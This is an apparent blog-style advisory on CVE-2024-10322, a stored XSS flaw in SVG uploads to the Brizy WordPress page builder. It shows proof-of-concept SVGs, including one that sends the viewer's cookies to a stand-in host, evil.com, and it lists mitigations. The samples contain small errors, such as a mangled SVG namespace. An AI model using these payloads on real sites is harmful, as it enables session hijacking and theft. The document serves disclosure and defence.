CVE-2024-10322 - How Brizy – Page Builder Plugin for WordPress Was Vulnerable to Authenticated SVG XSS

---

If you use WordPress to build sites, you may have heard of Brizy – Page Builder, a popular plugin used on more than 90,000 websites to create drag-and-drop designs. But did you know that until version 2.6.8, Brizy had a critical security flaw (CVE-2024-10322) that could let an attacker inject persistent scripts via SVG file uploads? In this post, I’ll break it down in plain English—what the bug is, how it works, how it’s exploited, and what you can do about it. I'll also include real code snippets and links to check out more.

What is CVE-2024-10322?

CVE-2024-10322 is a Stored Cross-Site Scripting (XSS) vulnerability in the Brizy – Page Builder plugin for WordPress, affecting all versions up to and including 2.6.8.

Vector: REST API endpoint for uploading files

- Impact: Attackers can upload SVG files containing JavaScript. When anyone views the file in their browser, the script runs—potentially letting attackers hijack accounts, steal cookies, or carry out other malicious actions.

Why SVGs Matter

SVG (Scalable Vector Graphics) files are images in XML. They can contain JavaScript or other code if not sanitized. Many apps let you upload images, but SVGs can be tricky because they might secretly hold scripts.

A simple (bad) SVG might look like this

<svg xmlns="http://www.w3.org/200/svg"; onload="alert('XSS!')"></svg>

If a plugin like Brizy doesn’t remove that nasty onload attribute, anyone who views this "image" in their browser would see an alert box—and an attacker could do much worse.

How Did the Vulnerability Work?

Brizy’s file upload relied on a REST API endpoint that allowed users (with Author role or higher) to upload images to use in their posts and pages. Here's what went wrong:

SVG Upload Allowed: SVG files could be uploaded.

2. Input Not Sanitized: The plugin did not properly check SVG file contents for JavaScript or dangerous attributes.

Proof-of-Concept Exploit

Let’s see an attack in action with code examples.

Save this as evil.svg

<svg xmlns="http://www.w3.org/200/svg"; onload="alert(document.cookie)">
  <circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" />
</svg>

This SVG will alert (pop up) your browser cookie if rendered directly.

Step 3: Access the Image

Whenever anyone with higher privileges (Editor, Admin), or even a site visitor, views the page or directly accesses the SVG file, the malicious code in the SVG runs.

Advanced Payloads

Attackers can use more sophisticated JavaScript payloads. For example, they might steal your login session:

<svg xmlns="http://www.w3.org/200/svg";>
  <script>
    // Send cookies to attacker's server
    fetch('https://evil.com/xss?c='+document.cookie);
  </script>
</svg>

Why Is This Bad?

- Persistent XSS: The script is stored on the site. Every time someone views the SVG—now or in the future—it executes.
- Elevated Attacks: If an Author exploits the Editor or Admin this way, they might upgrade their own permissions or plant more malware.
- Widespread Exposure: Many other users or plugins might display uploaded SVGs, spreading the attack further.

Vulnerable Versions: Brizy ≤ 2.6.8

- Fixed in: Brizy 2.6.9 (changelog)
- Discovery: Wordfence Threat Intelligence

Update Brizy: Immediately upgrade to Brizy version 2.6.9 or higher.

2. Restrict File Uploads: Limit SVG uploads to trusted users; consider disabling SVG uploads altogether unless necessary.

Regularly Audit Users: Remove inactive or untrusted users with elevated access.

5. Monitor and Respond: Watch your site for unexpected user activity, strange files, or new SVG images.

References and Further Reading

- Brizy WordPress Plugin Page
- Wordfence Security Advisory: XSS in Brizy
- CVE Details: CVE-2024-10322
- How to Secure SVG Files in WordPress

Conclusion

CVE-2024-10322 is a wake-up call for plugin developers and website administrators. Even popular plugins might gloss over input sanitization or output escaping, leaving thousands of sites at risk. If you use Brizy, update now and rethink your upload policies—SVGs are not as harmless as they look!

Stay safe, keep your plugins updated, and always be careful with file uploads!

Exclusive Tip: Want to check your site for SVG XSS? Use browser developer tools to search for SVG files and see if they contain <script> tags or suspicious attributes like onload. If in doubt, remove and re-upload sanitized versions!


*This post is original and tailored to help non-experts understand and respond to a real-world security exploit. If you found it useful, share it with your team!*

Timeline

Published on: 02/12/2025 13:15:07 UTC
Last modified on: 02/20/2025 20:40:34 UTC